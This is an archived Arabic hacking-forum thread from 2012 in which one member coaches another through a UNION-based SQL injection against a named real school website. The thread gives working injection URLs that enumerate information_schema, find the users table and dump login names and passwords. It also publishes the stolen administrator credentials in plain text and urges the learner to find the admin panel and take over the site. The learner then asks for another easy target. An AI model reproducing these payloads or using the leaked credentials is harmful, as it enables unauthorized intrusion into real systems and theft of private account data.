:: vBspiders Professional Network ::
صفحة 2 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   سؤال بسيط فى دورة sql (http://www.vbspiders.com/vb/t63014.html)

Mezo Shams 06-25-2012 11:27 PM
رد: سؤال بسيط فى دورة sql
 
تم العثور على الاسم والباص بس لسة فية تكملة بس اوحشة الموقع دة ان الاسم والباص انا مش شايفهم اصلا الموقع حد يجبهولى منة
وانا هاجرب شوية حجات
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_sche ma),2,3,4,5,6,7,8+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

TIKTAKram 06-25-2012 11:43 PM
رد: سؤال بسيط فى دورة sql
 
أخي الكريم، للأسف يظهر أنك لا زلت مبتدأ في الـSQL مازال الوقت طويل أمامك

راح تكون هذه آخر مساعدة أقدر أعملهالك

و راح أشرح لك حقن هذا الموقع خطوة خطوة بدون أي صعوبة

لنبدأ على بركة الله :

الموقع مصاب و الدليل لما نضع الـ(') شوف :
['CODE]http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1
[/CODE]

الآن راح نشوف عدد الأعمدة عن طريق الأمر order by و راح نجد العمود المصاب هو 1 و العمود يظهر يسار الصفحة كأنه عنوان و هذه هي الحقنة لحد الآن :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
الآن نشوف إصدار قاعدة البيانات من خلال العمود 1 و راح نجد أن الإصدار هو الإصدار رقم 5

نطبق الحقنة التالية مباشرة، لاحظ جيدا :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns--
لحد الآن ماشاء الله الحقنة تعمل، الآن نروح نبحث عن العمود يلي إسمه يشبه %pas% و نكون وصلنا لهذه الحقنة :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 37)--
ما شاء الله، و الحمد لله، ظهر العمود و كل شيء الخاص بالعمود لي يشبه %pas%

الآن نروح لسورس الصفحة و نشوف راح نجد المعلومات التالية :
users:passwd:berze_web

يعني أن إسم الجدول هو users و إسم العمود هو passwd

الآن نكمل الحقنة و راح تصير هكذا :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--
ما شاء الله، و الحمد لله، ظهرت لنا جميع الأعمدة الموجودة في الجدول users و هي :
login_name و passwd

و الآن نكمل حقنتنا عادي جدا، و نستخرج الباسوارد و اليوزر من خلال تكملة الحقنة لاحظ :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(login_name,0x3a,passwd),2,3,4,5,6,7,8+from+users--
ما شاء الله، و الحمد لله، إنتهينا و إستخرجنا معلومات الموقع و مدير الموقع وهذه هي :
user1 = rlaci
pass1= chipchip

user2= www
pass2= HEkbY3U6

الآن يبقى عليك تبحث عن مسار لوحة التحكم و تخترق الموقع و مبروك عليك

للأسف بحثت على اللوحة بسرعة لكن لم أجدها سامحني ليس لي الوقت لأقوم بفحص ملفات الموقع

هذا كل لي أقدر أساعدك فيه، و الله كتبت حتى التعب ههههه لكن مو غالي عنك

بالتوفيق إن شاء الله

تحيتي ...

Mezo Shams 06-25-2012 11:51 PM
رد: سؤال بسيط فى دورة sql
 
انا عملت كدة عل ى فكرة وشوف الرد فى فوق دة علطول هتلاقينى عملتة بس الباص مش شايفة اوى
الصورة مخبية علية انا كدة فرحان لانى عرفت وماشى صح شكرا ليك

TIKTAKram 06-25-2012 11:55 PM
رد: سؤال بسيط فى دورة sql
 
لا شكر على واجب، أنا رجعت للمنتدى لأخدم أعضائه

بالتوفيق إن شاء الله و أتمنى أنك تسجل الشرح كإجابة للموضوع

حتى يستفاد الأعضاء الباقون

بالتوفيق

Mezo Shams 06-26-2012 12:06 AM
رد: سؤال بسيط فى دورة sql
 
تم يا غالى بس انا عايز اخر طلب من حضرتك اخر طلب بس عايز كمان موقع واحد سهل بردو اجرب علية اشوف كدة انا بقيت حلو ولا لسة


الساعة الآن 02:38 PM
صفحة 2 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0